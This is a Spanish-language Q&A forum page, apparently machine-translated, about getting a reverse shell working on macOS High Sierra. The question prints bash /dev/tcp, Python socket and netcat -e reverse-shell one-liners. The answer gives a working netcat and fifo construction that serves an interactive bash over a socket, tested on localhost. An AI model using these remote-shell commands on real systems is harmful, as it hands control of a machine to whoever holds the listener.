4 votos

lily avatar

Crear reverse shell uso de Alta de la Sierra?

Preguntado el 8 de Mayo, 2018
Cuando se hizo la pregunta
187 visitas
Cuantas visitas ha tenido la pregunta
1 Respuestas
Cuantas respuestas ha tenido la pregunta
Resuelta
Estado actual de la pregunta

Estoy tratando de crear un reverse shell escucha con Alta Sierra, pero nada parece funcionar.

El comando bash algo simplemente se cuelga en el terminal y el tiempo de espera. 

bash -i >& /dev/tcp/0.0.0.0/8080 0>&1

El comando python errores con "Conexión rechazada" cuando el uso de python o python v2.7.

python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("0.0.0.0",8080));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

el comando netcat errores con "nc: no válida la opción -e"

nc -e /bin/bash 0.0.0.0 8080

He probado otras soluciones que he encontrado en línea, pero usted consigue la idea...

Es posible crear un reverse shell (de preferencia con acceso a bash) con Alta Sierra?

especificaciones:

sh-3.2# system_profiler SPSoftwareDataType 
Software:

    System Software Overview:

      System Version: macOS 10.13.4 (17E199)
      Kernel Version: Darwin 17.5.0
      Boot Volume: lily
      Boot Mode: Normal
      Computer Name: lily's MacBook Air
      User Name: System Administrator (root)
      Secure Virtual Memory: Enabled
      System Integrity Protection: Enabled
      Time since boot: 2:03
Preguntado el 8 de Mayo, 2018 por lily

Respuesta

¿Demasiados anuncios?

6voto

H-man avatar
H-man Puntos 1158

Si entiendo correctamente, usted desea conectar a su Alta Sierra de la máquina a partir de una fuente externa a través de algo como netcat (nc), enviar comandos de bash, y ver la respuesta.

Hay más seguro y más sencillas maneras de hacer esto usando ssh, pero suponiendo que esto es una especie de experimento o de desarrollo truco, aquí es cómo usted puede hacer lo que le estás pidiendo.

Mi respuesta se basa en una respuesta que he encontrado en otros lugares SE (https://superuser.com/a/607855), que se basa en otra MANERA/SE respuestas.

En primer lugar hacer una fifo:

mkfifo myfifo

A continuación, iniciar 'nc' mediante el fifo como su entrada, en la tubería de salida de bash, y el redireccionamiento de bash salida a la fifo:

nc -l 127.0.0.1 8080 < myfifo | /bin/bash -i > myfifo 2>&1

('- I' bandera para bash indica un shell interactivo, y puede no ser deseable para este caso de uso.)

Desde el dispositivo remoto (en mis pruebas, yo mismo):

nc 127.0.0.1 8080

Si desea invertir los roles, es decir, la Sierra Alta de la máquina es el establecimiento de la conexión con el dispositivo remoto, y dando al dispositivo remoto el acceso a bash en el SA host, mover la escucha de la bandera (-l). Así, el dispositivo remoto sería empezar a netcat primero en el modo de escucha:

nc -l 127.0.0.1 8080

A continuación, la Sierra Alta de host se conecta al dispositivo remoto:

nc 127.0.0.1 8080 < myfifo | /bin/bash -i > myfifo 2>&1
Respondido el 8 de Mayo, 2018 por H-man (1158 Puntos )

Preguntas relacionadas

Preguntas Destacadas

Etiquetas mas usadas

En nuestra red

AppleAyuda.com

AppleAyuda es una comunidad de usuarios de los productos de Apple en la que puedes resolver tus problemas y dudas.
Puedes consultar las preguntas de otros usuarios, hacer tus propias preguntas o resolver las de los demás.

Powered by:

Yandex
X